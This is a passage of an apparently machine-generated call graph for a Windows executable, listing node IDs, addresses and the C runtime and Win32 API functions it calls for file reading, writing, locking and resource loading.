104401->104402 104403 f10502 104402->104403 104404 f1057d 104403->104404 104410 f09c93 __mtinitlocknum 58 API calls 104403->104410 104413 f10576 104403->104413 104438 f06c50 59 API calls __lock 104403->104438 104439 f06cba LeaveCriticalSection LeaveCriticalSection _doexit 104403->104439 104440 f0881d 58 API calls 2 library calls 104404->104440 104407 f10584 104407->104413 104441 f09e2b InitializeCriticalSectionAndSpinCount 104407->104441 104408 f105f3 type_info::_Type_info_dtor 104408->104389 104410->104403 104412 f105aa EnterCriticalSection 104412->104413 104435 f105fe 104413->104435 104416 f10627 __wopenfile 104415->104416 104417 f10641 104416->104417 104429 f107fc 104416->104429 104448 f037cb 60 API calls 2 library calls 104416->104448 104446 f08b28 58 API calls __getptd_noexit 104417->104446 104419 f10646 104447 f08db6 9 API calls __gmtime64_s 104419->104447 104421 f05310 104434 f05332 LeaveCriticalSection LeaveCriticalSection _fprintf 104421->104434 104422 f1085f 104443 f185a1 104422->104443 104425 f107f5 104425->104429 104449 f037cb 60 API calls 2 library calls 104425->104449 104427 f10814 104427->104429 104450 f037cb 60 API calls 2 library calls 104427->104450 104429->104417 104429->104422 104430->104385 104431->104395 104432->104395 104433->104395 104434->104395 104442 f09d75 LeaveCriticalSection 104435->104442 104437 f10605 104437->104408 104438->104403 104439->104403 104440->104407 104441->104412 104442->104437 104451 f17d85 104443->104451 104445 f185ba 104445->104421 104446->104419 104447->104421 104448->104425 104449->104427 104450->104429 104454 f17d91 type_info::_Type_info_dtor 104451->104454 104452 f17da7 104536 f08b28 58 API calls __getptd_noexit 104452->104536 104454->104452 104456 f17ddd 104454->104456 104455 f17dac 104537 f08db6 9 API calls __gmtime64_s 104455->104537 104462 f17e4e 104456->104462 104459 f17df9 104538 f17e22 LeaveCriticalSection __unlock_fhandle 104459->104538 104461 f17db6 type_info::_Type_info_dtor 104461->104445 104463 f17e6e 104462->104463 104464 f044ea __wsopen_nolock 58 API calls 104463->104464 104468 f17e8a 104464->104468 104465 f17fc1 104466 f08dc6 __invoke_watson 8 API calls 104465->104466 104467 f185a0 104466->104467 104469 f17d85 __wsopen_helper 103 API calls 104467->104469 104468->104465 104470 f17ec4 104468->104470 104481 f17ee7 104468->104481 104471 f185ba 104469->104471 104472 f08af4 __dosmaperr 58 API calls 104470->104472 104471->104459 104473 f17ec9 104472->104473 104474 f08b28 __gmtime64_s 58 API calls 104473->104474 104475 f17ed6 104474->104475 104476 f08db6 __gmtime64_s 9 API calls 104475->104476 104478 f17ee0 104476->104478 104477 f17fa5 104479 f08af4 __dosmaperr 58 API calls 104477->104479 104478->104459 104480 f17faa 104479->104480 104482 f08b28 __gmtime64_s 58 API calls 104480->104482 104481->104477 104485 f17f83 104481->104485 104483 f17fb7 104482->104483 104484 f08db6 __gmtime64_s 9 API calls 104483->104484 104484->104465 104486 f0d294 __alloc_osfhnd 61 API calls 104485->104486 104487 f18051 104486->104487 104488 f1805b 104487->104488 104489 f1807e 104487->104489 104491 f08af4 __dosmaperr 58 API calls 104488->104491 104490 f17cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104489->104490 104501 f180a0 104490->104501 104492 f18060 104491->104492 104494 f08b28 __gmtime64_s 58 API calls 104492->104494 104493 f1811e GetFileType 104495 f18129 GetLastError 104493->104495 104496 f1816b 104493->104496 104498 f1806a 104494->104498 104500 f08b07 __dosmaperr 58 API calls 104495->104500 104508 f0d52a __set_osfhnd 59 API calls 104496->104508 104497 f180ec GetLastError 104502 f08b07 __dosmaperr 58 API calls 104497->104502 104499 f08b28 __gmtime64_s 58 API calls 104498->104499 104499->104478 104503 f18150 CloseHandle 104500->104503 104501->104493 104501->104497 104504 f17cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104501->104504 104505 f18111 104502->104505 104503->104505 104506 f1815e 104503->104506 104507 f180e1 104504->104507 104510 f08b28 __gmtime64_s 58 API calls 104505->104510 104509 f08b28 __gmtime64_s 58 API calls 104506->104509 104507->104493 104507->104497 104513 f18189 104508->104513 104511 f18163 104509->104511 104510->104465 104511->104505 104512 f18344 104512->104465 104515 f18517 CloseHandle 104512->104515 104513->104512 104514 f118c1 __lseeki64_nolock 60 API calls 104513->104514 104533 f1820a 104513->104533 104516 f181f3 104514->104516 104517 f17cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104515->104517 104519 f08af4 __dosmaperr 58 API calls 104516->104519 104516->104533 104518 f1853e 104517->104518 104521 f18546 GetLastError 104518->104521 104522 f18572 104518->104522 104519->104533 104520 f10e5b 70 API calls __read_nolock 104520->104533 104523 f08b07 __dosmaperr 58 API calls 104521->104523 104522->104465 104525 f18552 104523->104525 104524 f118c1 60 API calls __lseeki64_nolock 104524->104533 104529 f0d43d __free_osfhnd 59 API calls 104525->104529 104526 f10add __close_nolock 61 API calls 104526->104533 104527 f1823c 104528 f197a2 __chsize_nolock 82 API calls 104527->104528 104527->104533 104528->104527 104529->104522 104530 f0d886 __write 78 API calls 104530->104533 104531 f183c1 104532 f10add __close_nolock 61 API calls 104531->104532 104534 f183c8 104532->104534 104533->104512 104533->104520 104533->104524 104533->104526 104533->104527 104533->104530 104533->104531 104535 f08b28 __gmtime64_s 58 API calls 104534->104535 104535->104465 104536->104455 104537->104461 104538->104461 104540 ee4b83 104539->104540 104541 ee4c3f LoadLibraryA 104539->104541 104540->104341 104540->104342 104541->104540 104542 ee4c50 GetProcAddress 104541->104542 104542->104540 104544 ee4ea3 FindResourceExW 104543->104544 104548 ee4ec0 104543->104548 104545 f1d933 LoadResource 104544->104545 104544->104548 104546 f1d948 SizeofResource 104545->104546 104545->104548 104547 f1d95c LockResource 104546->104547 104546->104548 104547->104548 104548->104350 104550 ee4ef4 104549->104550 104553 f1d9ab 104549->104553 104555 f0584d 104550->104555 104552 ee4f02 104552->104361 104554->104350 104556 f05859 type_info::_Type_info_dtor 104555->104556 104557 f0586b 104556->104557 104559 f05891 104556->104559 104568 f08b28 58 API calls __getptd_noexit 104557->104568 104570 f06c11 104559->104570 104560 f05870 104569 f08db6 9 API calls __gmtime64_s 104560->104569 104563 f05897 104576 f057be 83 API calls 5 library calls 104563->104576 104565 f058a6 104577 f058c8 LeaveCriticalSection LeaveCriticalSection _fprintf 104565->104577 104567 f0587b type_info::_Type_info_dtor 104567->104552 104568->104560 104569->104567 104571 f06c21 104570->104571 104572 f06c43 EnterCriticalSection 104570->104572 104571->104572 104573 f06c29 104571->104573 104574 f06c39 104572->104574 104575 f09c0b __lock 58 API calls 104573->104575 104574->104563 104575->104574 104576->104565 104577->104567 104581 f055fd 104578->104581 104580 ee4f2e 104580->104369 104582 f05609 type_info::_Type_info_dtor 104581->104582 104583 f0564c 104582->104583 104585 f05644 type_info::_Type_info_dtor 104582->104585 104587 f0561f _memset 104582->104587 104584 f06c11 __lock_file 59 API calls 104583->104584 104586 f05652 104584->104586 104585->104580 104594 f0541d 104586->104594 104608 f08b28 58 API calls __getptd_noexit 104587->104608 104590 f05639 104609 f08db6 9 API calls __gmtime64_s 104590->104609 104598 f05438 _memset 104594->104598 104600 f05453 104594->104600 104595 f05443 104706 f08b28 58 API calls __getptd_noexit 104595->104706 104597 f05448 104707 f08db6 9 API calls __gmtime64_s 104597->104707 104598->104595 104598->104600 104603 f05493 104598->104603 104610 f05686 LeaveCriticalSection LeaveCriticalSection _fprintf 104600->104610 104602 f055a4 _memset 104709 f08b28 58 API calls __getptd_noexit 104602->104709 104603->104600 104603->104602 104611 f046e6 104603->104611 104618 f10e5b 104603->104618 104686 f10ba7 104603->104686 104708 f10cc8 58 API calls 3 library calls 104603->104708 104608->104590 104609->104585 104610->104585 104612 f046f0 104611->104612 104613 f04705 104611->104613 104710 f08b28 58 API calls __getptd_noexit 104612->104710 104613->104603 104615 f046f5 104711 f08db6 9 API calls __gmtime64_s 104615->104711 104617 f04700 104617->104603 104619 f10e93 104618->104619 104620 f10e7c 104618->104620 104622 f115cb 104619->104622 104627 f10ecd 104619->104627 104721 f08af4 58 API calls __getptd_noexit 104620->104721 104737 f08af4 58 API calls __getptd_noexit 104622->104737 104624 f10e81 104722 f08b28 58 API calls __getptd_noexit 104624->104722 104625 f115d0 104738 f08b28 58 API calls __getptd_noexit 104625->104738 104628 f10ed5 104627->104628 104635 f10eec 104627->104635 104723 f08af4 58 API calls __getptd_noexit 104628->104723 104631 f10ee1 104739 f08db6 9 API calls __gmtime64_s 104631->104739 104632 f10eda 104724 f08b28 58 API calls __getptd_noexit 104632->104724 104634 f10f01 104725 f08af4 58 API calls __getptd_noexit 104634->104725 104635->104634 104638 f10f1b 104635->104638 104639 f10f39 104635->104639 104666 f10e88 104635->104666 104638->104634 104641 f10f26 104638->104641 104726 f0881d 58 API calls 2 library calls 104639->104726 104712 f15c6b 104641->104712 104642 f10f49 104644 f10f51 104642->104644 104645 f10f6c 104642->104645 104727 f08b28 58 API calls __getptd_noexit 104644->104727 104729 f118c1 60 API calls 3 library calls 104645->104729 104646 f1103a 104648 f110b3 ReadFile 104646->104648 104653 f11050 GetConsoleMode 104646->104653 104651 f11593 GetLastError 104648->104651 104652 f110d5 104648->104652 104650 f10f56 104728 f08af4 58 API calls __getptd_noexit 104650->104728 104655 f115a0 104651->104655 104656 f11093 104651->104656 104652->104651 104660 f110a5 104652->104660 104657 f110b0 104653->104657 104658 f11064 104653->104658 104735 f08b28 58 API calls __getptd_noexit 104655->104735 104668 f11099 104656->104668 104730 f08b07 58 API calls 2 library calls 104656->104730 104657->104648 104658->104657 104661 f1106a ReadConsoleW 104658->104661 104660->104668 104669 f1110a 104660->104669 104670 f11377 104660->104670 104661->104660 104662 f1108d GetLastError 104661->104662 104662->104656 104664 f115a5 104736 f08af4 58 API calls __getptd_noexit 104664->104736 104666->104603 104667 f02d55 _free 58 API calls 104667->104666 104668->104666 104668->104667 104672 f11176 ReadFile 104669->104672 104678 f111f7 104669->104678 104670->104668 104676 f1147d ReadFile 104670->104676 104673 f11197 GetLastError 104672->104673 104682 f111a1 104672->104682 104673->104682 104674 f112b4 104680 f11264 MultiByteToWideChar 104674->104680 104733 f118c1 60 API calls 3 library calls 104674->104733 104675 f112a4 104732 f08b28 58 API calls __getptd_noexit 104675->104732 104677 f114a0 GetLastError 104676->104677 104685 f114ae 104676->104685 104677->104685 104678->104668 104678->104674 104678->104675 104678->104680 104680->104662 104680->104668 104682->104669 104731 f118c1 60 API calls 3 library calls 104682->104731 104685->104670 104734 f118c1 60 API calls 3 library calls 104685->104734 104687 f10bb2 104686->104687 104691 f10bc7 104686->104691 104773 f08b28 58 API calls __getptd_noexit 104687->104773 104689 f10bb7 104774 f08db6 9 API calls __gmtime64_s 104689->104774 104692 f10bfc 104691->104692 104698 f10bc2 104691->104698 104775 f15fe4 58 API calls __malloc_crt 104691->104775 104694 f046e6 __flsbuf 58 API calls 104692->104694 104695 f10c10 104694->104695 104740 f10d47 104695->104740 104697 f10c17 104697->104698 104699 f046e6 __flsbuf 58 API calls 104697->104699 104698->104603 104700 f10c3a 104699->104700 104700->104698 104701 f046e6 __flsbuf 58 API calls 104700->104701 104702 f10c46 104701->104702 104702->104698 104703 f046e6 __flsbuf 58 API calls 104702->104703 104704 f10c53 104703->104704 104705 f046e6 __flsbuf 58 API calls 104704->104705 104705->104698 104706->104597 104707->104600 104708->104603 104709->104597 104710->104615 104711->104617 104713 f15c76 104712->104713 104715 f15c83 104712->104715 104714 f08b28 __gmtime64_s 58 API calls 104713->104714 104716 f15c7b 104714->104716 104717 f15c8f 104715->104717 104718 f08b28 __gmtime64_s 58 API calls 104715->104718 104716->104646 104717->104646 104719 f15cb0 104718->104719 104720 f08db6 __gmtime64_s 9 API calls 104719->104720 104720->104716 104721->104624 104722->104666 104723->104632 104724->104631 104725->104632 104726->104642 104727->104650 104728->104666 104729->104641 104730->104668 104731->104682 104732->104668 104733->104680 104734->104685 104735->104664 104736->104668 104737->104625 104738->104631 104739->104666 104741 f10d53 type_info::_Type_info_dtor 104740->104741 104742 f10d60 104741->104742 104743 f10d77 104741->104743 104744 f08af4 __dosmaperr 58 API calls 104742->104744 104745 f10e3b 104743->104745 104746 f10d8b 104743->104746 104748 f10d65 104744->104748 104747 f08af4 __dosmaperr 58 API calls 104745->104747 104749 f10db6 104746->104749 104750 f10da9 104746->104750 104751 f10dae 104747->104751 104752 f08b28 __gmtime64_s 58 API calls 104748->104752 104754 f10dc3 104749->104754 104755 f10dd8 104749->104755 104753 f08af4 __dosmaperr 58 API calls 104750->104753 104758 f08b28 __gmtime64_s 58 API calls 104751->104758 104762 f10d6c type_info::_Type_info_dtor 104752->104762 104753->104751 104756 f08af4 __dosmaperr 58 API calls 104754->104756 104757 f0d206 ___lock_fhandle 59 API calls 104755->104757 104759 f10dc8 104756->104759 104760 f10dde 104757->104760 104761 f10dd0 104758->104761 104763 f08b28 __gmtime64_s 58 API calls 104759->104763 104764 f10df1 104760->104764 104765 f10e04 104760->104765 104768 f08db6 __gmtime64_s 9 API calls 104761->104768 104762->104697 104763->104761 104767 f10e5b __read_nolock 70 API calls 104764->104767 104766 f08b28 __gmtime64_s 58 API calls 104765->104766 104769 f10e09 104766->104769 104770 f10dfd 104767->104770 104768->104762 104771 f08af4 __dosmaperr 58 API calls 104769->104771 104772 f10e33 __read LeaveCriticalSection 104770->104772 104771->104770 104772->104762 104773->104689 104774->104698 104775->104692 104779 f0520a GetSystemTimeAsFileTime 104776->104779 104778 f48f6e 104778->104371 104780 f05238 __aulldiv 104779->104780 104780->104778 104782 f05c6c type_info::_Type_info_dtor 104781->104782 104783 f05c93 104782->104783 104784 f05c7e 104782->104784 104786 f06c11 __lock_file 59 API calls 104783->104786 104795 f08b28 58 API calls __getptd_noexit 104784->104795 104788 f05c99 104786->104788 104787 f05c83 104796 f08db6 9 API calls __gmtime64_s 104787->104796 104797 f058d0 67 API calls 6 library calls 104788->104797 104791 f05ca4 104798 f05cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 104791->104798 104793 f05cb6 104794 f05c8e type_info::_Type_info_dtor 104793->104794 104794->104375 104795->104787 104796->104794 104797->104791 104798->104793 104799->104238 104800->104247 104801->104261 104802->104263 104803->104259 104804->104268 104806 ee9169 Mailbox 104805->104806 104807 f1f19f 104806->104807 104812 ee9173 104806->104812 104808 f00db6 Mailbox 59 API calls 104807->104808 104810 f1f1ab 104808->104810 104809 ee917a 104809->104274 104812->104809 104813 ee9c90 104812->104813 104815 ee9c9b 104813->104815 104814 ee9cd2 104814->104812 104815->104814 104818 ee8cd4 59 API calls Mailbox 104815->104818 104817 ee9cfd 104817->104812 104818->104817 104820 ee9d4a 104819->104820 104830 ee9d78 Mailbox 104819->104830 104821 ee9d9d 104820->104821 104824 ee9d50 Mailbox 104820->104824 104822 ee8047 59 API calls 104821->104822 104822->104830 104823 ee9d64 104825 ee9d6f 104823->104825 104826 ee9dcc 104823->104826 104823->104830 104824->104823 104829 f1fa0f 104824->104829 104827 f1f9e6 VariantClear 104825->104827 104825->104830 104826->104830 104833 ee8cd4 59 API calls Mailbox 104826->104833 104827->104830 104829->104830 104834 f36e8f 59 API calls 104829->104834 104830->104283 104832->104280 104833->104830 104834->104830 104836 f49748 __tzset_nolock _wcscmp 104835->104836 104837 ee4f0b 74 API calls 104836->104837 104838 f495dc 104836->104838 104839 f49109 GetSystemTimeAsFileTime 104836->104839 104840 ee4ee5 85 API calls 104836->104840 104837->104836 104838->104289 104838->104316 104839->104836 104840->104836 104842 f48b1f 104841->104842 104843 f48b11 104841->104843 104845 f48b64 104842->104845 104846 f0525b 115 API calls 104842->104846 104871 f48b28 104842->104871 104844 f0525b 115 API calls 104843->104844 104844->104842 104872 f48d91 104845->104872 104847 f48b49 104846->104847 104847->104845 104850 f48b52 104847->104850 104849 f48ba8 104851 f48bac 104849->104851 104852 f48bcd 104849->104852 104853 f053a6 __fcloseall 83 API calls 104850->104853 104850->104871 104855 f48bb9 104851->104855 104856 f053a6 __fcloseall 83 API calls 104851->104856 104876 f489a9 104852->104876 104853->104871 104858 f053a6 __fcloseall 83 API calls 104855->104858 104855->104871 104856->104855 104858->104871 104859 f48bfb 104885 f48c2b 104859->104885 104860 f48bdb 104862 f48be8 104860->104862 104864 f053a6 __fcloseall 83 API calls 104860->104864 104865 f053a6 __fcloseall 83 API calls 104862->104865 104862->104871 104864->104862 104865->104871 104868 f48c16 104870 f053a6 __fcloseall 83 API calls 104868->104870 104868->104871 104870->104871 104871->104318 104873 f48db6 104872->104873 104875 f48d9f __tzset_nolock _memmove 104872->104875 104874 f055e2 __fread_nolock 74 API calls 104873->104874 104874->104875 104875->104849 104877 f0571c std::exception::_Copy_str 58 API calls 104876->104877 104878 f489b8 104877->104878 104879 f0571c std::exception::_Copy_str 58 API calls 104878->104879 104880 f489cc 104879->104880 104881 f0571c std::exception::_Copy_str 58 API calls 104880->104881 104882 f489e0 104881->104882 104883 f48d0d 58 API calls 104882->104883 104884 f489f3 104882->104884 104883->104884 104884->104859 104884->104860 104886 f48c40 104885->104886 104887 f48cf8 104886->104887 104889 f48a05 74 API calls 104886->104889 104892 f48c02 104886->104892 104914 f48e12 104886->104914 104922 f48aa1 74 API calls 104886->104922 104918 f48f35 104887->104918 104889->104886 104893 f48d0d 104892->104893 104894 f48d20 104893->104894 104895 f48d1a 104893->104895 104897 f02d55 _free 58 API calls 104894->104897 104899 f48d31 104894->104899 104896 f02d55 _free 58 API calls 104895->104896 104896->104894 104897->104899 104898 f02d55 _free 58 API calls 104900 f48c09 104898->104900 104899->104898 104899->104900 104900->104868 104901 f053a6 104900->104901 104902 f053b2 type_info::_Type_info_dtor 104901->104902 104903 f053c6 104902->104903 104905 f053de 104902->104905 104971 f08b28 58 API calls __getptd_noexit 104903->104971 104907 f06c11 __lock_file 59 API calls 104905->104907 104910 f053d6 type_info::_Type_info_dtor 104905->104910 104906 f053cb 104972 f08db6 9 API calls __gmtime64_s 104906->104972 104909 f053f0 104907->104909 104955 f0533a 104909->104955 104910->104868 104915 f48e61 104914->104915 104916 f48e21 104914->104916 104915->104916 104923 f48ee8 104915->104923 104916->104886 104919 f48f42 104918->104919 104920 f48f53 104918->104920 104921 f04863 80 API calls 104919->104921 104920->104892 104921->104920 104922->104886 104924 f48f14 104923->104924 104925 f48f25 104923->104925 104927 f04863 104924->104927 104925->104915 104928 f0486f type_info::_Type_info_dtor 104927->104928 104929 f048a5 104928->104929 104930 f0488d 104928->104930 104932 f0489d type_info::_Type_info_dtor 104928->104932 104933 f06c11 __lock_file 59 API calls 104929->104933 104952 f08b28 58 API calls __getptd_noexit 104930->104952 104932->104925 104935 f048ab 104933->104935 104934 f04892 104953 f08db6 9 API calls __gmtime64_s 104934->104953 104940 f0470a 104935->104940 104943 f04719 104940->104943 104947 f04737 104940->104947 104941 f04727 104942 f08b28 __gmtime64_s 58 API calls 104941->104942 104944 f0472c 104942->104944 104943->104941 104946 f04751 _memmove 104943->104946 104943->104947 104945 f08db6 __gmtime64_s 9 API calls 104944->104945 104945->104947 104946->104947 104948 f0ae1e __flsbuf 78 API calls 104946->104948 104949 f04a3d __flush 78 API calls 104946->104949 104950 f046e6 __flsbuf 58 API calls 104946->104950 104951 f0d886 __write 78 API calls 104946->104951 104954 f048dd LeaveCriticalSection LeaveCriticalSection _fprintf 104947->104954 104948->104946 104949->104946 104950->104946 104951->104946 104952->104934 104953->104932 104954->104932 104956 f05349 104955->104956 104957 f0535d 104955->104957 105010 f08b28 58 API calls __getptd_noexit 104956->105010 104963 f05359 104957->104963 104974 f04a3d 104957->104974 104959 f0534e 105011 f08db6 9 API calls __gmtime64_s 104959->105011 104973 f05415 LeaveCriticalSection LeaveCriticalSection _fprintf 104963->104973 104966 f046e6 __flsbuf 58 API calls 104967 f05377 104966->104967 104984 f10a02 104967->104984 104969 f0537d 104969->104963 104970 f02d55 _free 58 API calls 104969->104970 104970->104963 104971->104906 104972->104910 104973->104910 104975 f04a50 104974->104975 104979 f04a74 104974->104979 104976 f046e6 __flsbuf 58 API calls 104975->104976 104975->104979 104977 f04a6d 104976->104977 105012 f0d886 104977->105012 104980 f10b77 104979->104980 104981 f05371 104980->104981 104982 f10b84 104980->104982 104981->104966 104982->104981 104983 f02d55 _free 58 API calls 104982->104983 104983->104981 104985 f10a0e type_info::_Type_info_dtor 104984->104985 104986 f10a1b 104985->104986 104987 f10a32 104985->104987 105137 f08af4 58 API calls __getptd_noexit 104986->105137 104988 f10abd 104987->104988 104991 f10a42 104987->104991 105142 f08af4 58 API calls __getptd_noexit 104988->105142 104990 f10a20 105138 f08b28 58 API calls __getptd_noexit 104990->105138 104994 f10a60 104991->104994 104995 f10a6a 104991->104995 105139 f08af4 58 API calls __getptd_noexit 104994->105139 104998 f0d206 ___lock_fhandle 59 API calls 104995->104998 104996 f10a65 105143 f08b28 58 API calls __getptd_noexit 104996->105143 105000 f10a70 104998->105000 105002 f10a83 105000->105002 105003 f10a8e 105000->105003 105001 f10ac9 105144 f08db6 9 API calls __gmtime64_s 105001->105144 105122 f10add 105002->105122 105140 f08b28 58 API calls __getptd_noexit 105003->105140 105007 f10a27 type_info::_Type_info_dtor 105007->104969 105008 f10a89 105141 f10ab5 LeaveCriticalSection __unlock_fhandle 105008->105141 105010->104959 105011->104963 105013 f0d892 type_info::_Type_info_dtor 105012->105013 105014 f0d8b6 105013->105014 105015 f0d89f 105013->105015 105016 f0d955 105014->105016 105018 f0d8ca 105014->105018 105113 f08af4 58 API calls __getptd_noexit 105015->105113 105119 f08af4 58 API calls __getptd_noexit 105016->105119 105021 f0d8f2 105018->105021 105022 f0d8e8 105018->105022 105020 f0d8a4 105114 f08b28 58 API calls __getptd_noexit 105020->105114 105040 f0d206 105021->105040 105115 f08af4 58 API calls __getptd_noexit 105022->105115 105023 f0d8ed 105120 f08b28 58 API calls __getptd_noexit 105023->105120 105027 f0d8f8 105029 f0d90b 105027->105029 105030 f0d91e 105027->105030 105049 f0d975 105029->105049 105116 f08b28 58 API calls __getptd_noexit 105030->105116 105031 f0d961 105121 f08db6 9 API calls __gmtime64_s 105031->105121 105035 f0d917 105118 f0d94d LeaveCriticalSection __unlock_fhandle 105035->105118 105036 f0d923 105117 f08af4 58 API calls __getptd_noexit 105036->105117 105037 f0d8ab type_info::_Type_info_dtor 105037->104979 105041 f0d212 type_info::_Type_info_dtor 105040->105041 105042 f0d261 EnterCriticalSection 105041->105042 105043 f09c0b __lock 58 API calls 105041->105043 105044 f0d287 type_info::_Type_info_dtor 105042->105044 105045 f0d237 105043->105045 105044->105027 105046 f0d24f 105045->105046 105047 f09e2b __alloc_osfhnd InitializeCriticalSectionAndSpinCount 105045->105047 105048 f0d28b ___lock_fhandle LeaveCriticalSection 105046->105048 105047->105046 105048->105042 105050 f0d982 __write_nolock 105049->105050 105051 f0d9b6 105050->105051 105052 f0d9e0 105050->105052 105053 f0d9c1 105050->105053 105054 f0c5f6 _$I10_OUTPUT 6 API calls 105051->105054 105056 f0da38 105052->105056 105057 f0da1c 105052->105057 105055 f08af4 __dosmaperr 58 API calls 105053->105055 105058 f0e1d6 105054->105058 105059 f0d9c6 105055->105059 105061 f0da51 105056->105061 105065 f118c1 __lseeki64_nolock 60 API calls 105056->105065 105060 f08af4 __dosmaperr 58 API calls 105057->105060 105058->105035 105062 f08b28 __gmtime64_s 58 API calls 105059->105062 105064 f0da21 105060->105064 105063 f15c6b __flsbuf 58 API calls 105061->105063 105066 f0d9cd 105062->105066 105067 f0da5f 105063->105067 105068 f08b28 __gmtime64_s 58 API calls 105064->105068 105065->105061 105069 f08db6 __gmtime64_s 9 API calls 105066->105069 105070 f0ddb8 105067->105070 105075 f099ac __beginthreadex 58 API calls 105067->105075 105071 f0da28 105068->105071 105069->105051 105072 f0ddd6 105070->105072 105073 f0e14b WriteFile 105070->105073 105074 f08db6 __gmtime64_s 9 API calls 105071->105074 105076 f0defa 105072->105076 105084 f0ddec 105072->105084 105077 f0ddab GetLastError 105073->105077 105082 f0dd78 105073->105082 105074->105051 105078 f0da8b GetConsoleMode 105075->105078 105088 f0dfef 105076->105088 105090 f0df05 105076->105090 105077->105082 105078->105070 105080 f0daca 105078->105080 105079 f0e184 105079->105051 105081 f08b28 __gmtime64_s 58 API calls 105079->105081 105080->105070 105083 f0dada GetConsoleCP 105080->105083 105086 f0e1b2 105081->105086 105082->105051 105082->105079 105087 f0ded8 105082->105087 105083->105079 105109 f0db09 105083->105109 105084->105079 105085 f0de5b WriteFile 105084->105085 105085->105077 105089 f0de98 105085->105089 105091 f08af4 __dosmaperr 58 API calls 105086->105091 105092 f0dee3 105087->105092 105093 f0e17b 105087->105093 105088->105079 105094 f0e064 WideCharToMultiByte 105088->105094 105089->105084 105095 f0debc 105089->105095 105090->105079 105096 f0df6a WriteFile 105090->105096 105091->105051 105098 f08b28 __gmtime64_s 58 API calls 105092->105098 105099 f08b07 __dosmaperr 58 API calls 105093->105099 105094->105077 105105 f0e0ab 105094->105105 105095->105082 105096->105077 105097 f0dfb9 105096->105097 105097->105082 105097->105090 105097->105095 105100 f0dee8 105098->105100 105099->105051 105103 f08af4 __dosmaperr 58 API calls 105100->105103 105101 f0e0b3 WriteFile 105102 f0e106 GetLastError 105101->105102 105101->105105 105102->105105 105103->105051 105104 f035f5 __write_nolock 58 API calls 105104->105109 105105->105082 105105->105088 105105->105095 105105->105101 105106 f162ba 60 API calls __write_nolock 105106->105109 105107 f0dbf2 WideCharToMultiByte 105107->105082 105108 f0dc2d WriteFile 105107->105108 105108->105077 105111 f0dc5f 105108->105111 105109->105082 105109->105104 105109->105106 105109->105107 105109->105111 105110 f17a5e WriteConsoleW CreateFileW __putwch_nolock 105110->105111 105111->105077 105111->105082 105111->105109 105111->105110 105112 f0dc87 WriteFile 105111->105112 105112->105077 105112->105111 105113->105020 105114->105037 105115->105023 105116->105036 105117->105035 105118->105037 105119->105023 105120->105031 105121->105037 105145 f0d4c3 105122->105145 105124 f10b41 105158 f0d43d 59 API calls 2 library calls 105124->105158 105126 f10aeb 105126->105124 105129 f0d4c3 __close_nolock 58 API calls 105126->105129 105136 f10b1f 105126->105136 105127 f0d4c3 __close_nolock 58 API calls 105130 f10b2b CloseHandle 105127->105130 105128 f10b49 105131 f10b6b 105128->105131 105159 f08b07 58 API calls 2 library calls 105128->105159 105132 f10b16 105129->105132 105130->105124 105133 f10b37 GetLastError 105130->105133 105131->105008 105135 f0d4c3 __close_nolock 58 API calls 105132->105135 105133->105124 105135->105136 105136->105124 105136->105127 105137->104990 105138->105007 105139->104996 105140->105008 105141->105007 105142->104996 105143->105001 105144->105007 105146 f0d4e3 105145->105146 105147 f0d4ce 105145->105147 105149 f08af4 __dosmaperr 58 API calls 105146->105149 105151 f0d508 105146->105151 105148 f08af4 __dosmaperr 58 API calls 105147->105148 105150 f0d4d3 105148->105150 105152 f0d512 105149->105152 105153 f08b28 __gmtime64_s 58 API calls 105150->105153 105151->105126 105154 f08b28 __gmtime64_s 58 API calls 105152->105154 105155 f0d4db 105153->105155 105156 f0d51a 105154->105156 105155->105126 105157 f08db6 __gmtime64_s 9 API calls 105156->105157 105157->105155 105158->105128 105159->105131 105161 f11940 __write_nolock 105160->105161 105162 f0079e GetLongPathNameW 105161->105162 105163 ee7bcc 59 API calls 105162->105163 105164 ee72bd 105163->105164 105165 ee700b 105164->105165 105166 ee7667 59 API calls 105165->105166 105167 ee701d 105166->105167 105168 ee4750 60 API calls 105167->105168 105169 ee7028 105168->105169 105170 f1e885 105169->105170 105171 ee7033 105169->105171 105176 f1e89f 105170->105176 105218 ee7908 61 API calls 105170->105218 105172 ee3f74 59 API calls 105171->105172 105174 ee703f 105172->105174 105212 ee34c2 105174->105212 105177 ee7052 Mailbox 105177->104072 105179 ee4ddd 136 API calls 105178->105179 105180 ee688f 105179->105180 105181 f1e031 105180->105181 105182 ee4ddd 136 API calls 105180->105182 105183 f4955b 122 API calls 105181->105183 105184 ee68a3 105182->105184 105185 f1e046 105183->105185 105184->105181 105188 ee68ab 105184->105188 105186 f1e067 105185->105186 105187 f1e04a 105185->105187 105190 f00db6 Mailbox 59 API calls 105186->105190 105189 ee4e4a 84 API calls 105187->105189 105191 f1e052 105188->105191 105192 ee68b7 105188->105192 105189->105191 105211 f1e0ac Mailbox 105190->105211 105312 f442f8 90 API calls _wprintf 105191->105312 105219 ee6a8c 105192->105219 105195 f1e060 105195->105186 105197 f1e260 105198 f02d55 _free 58 API calls 105197->105198 105199 f1e268 105198->105199 105200 ee4e4a 84 API calls 105199->105200 105205 f1e271 105200->105205 105204 f02d55 _free 58 API calls 105204->105205 105205->105204 105207 ee4e4a 84 API calls 105205->105207 105318 f3f7a1 89 API calls 4 library calls 105205->105318 105207->105205 105208 ee7de1 59 API calls 105208->105211 105211->105197 105211->105205 105211->105208 105313 f3f73d 59 API calls 2 library calls 105211->105313 105314 f3f65e 61 API calls 2 library calls 105211->105314 105315 f4737f 59 API calls Mailbox 105211->105315 105316 ee750f 59 API calls 2 library calls 105211->105316 105317 ee735d 59 API calls Mailbox 105211->105317 105213 ee34d4 105212->105213 105217 ee34f3 _memmove 105212->105217 105216 f00db6 Mailbox 59 API calls 105213->105216 105214 f00db6 Mailbox 59 API calls 105215 ee350a 105214->105215 105215->105177 105216->105217 105217->105214 105218->105170 105220 ee6ab5 105219->105220 105221 f1e41e 105219->105221 105324 ee57a6 60 API calls Mailbox 105220->105324 105391 f3f7a1 89 API calls 4 library calls 105221->105391 105224 f1e431 105392 f3f7a1 89 API calls 4 library calls 105224->105392 105225 ee6ad7 105325 ee57f6 67 API calls 105225->105325 105227 ee6aec 105227->105224 105229 ee6af4 105227->105229 105230 ee7667 59 API calls 105229->105230 105232 ee6b00 105230->105232 105231 f1e44d 105234 ee6b61 105231->105234 105326 f00957 60 API calls __write_nolock 105232->105326 105236 